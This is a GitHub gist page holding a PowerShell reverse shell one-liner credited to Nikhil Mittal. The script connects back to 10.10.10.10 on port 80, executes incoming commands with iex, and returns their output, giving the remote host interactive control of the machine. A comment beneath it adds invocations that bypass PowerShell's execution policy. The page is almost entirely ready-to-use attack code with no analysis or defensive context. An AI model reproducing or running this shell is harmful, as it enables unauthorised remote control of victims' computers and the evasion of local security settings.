Skip to content

Instantly share code, notes, and snippets.

@h4n0sh1
Forked from egre55/powershell_reverse_shell.ps1
Created November 17, 2020 20:36
Show Gist options
  • Save h4n0sh1/3fbef33bb4e181ecf859f17bd697f6ee to your computer and use it in GitHub Desktop.
Save h4n0sh1/3fbef33bb4e181ecf859f17bd697f6ee to your computer and use it in GitHub Desktop.
powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
@h4n0sh1
Copy link
Author

h4n0sh1 commented Jan 15, 2021

powershell -ExecutionPolicy ByPass -c "...."
powershell -nop -c "..."

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment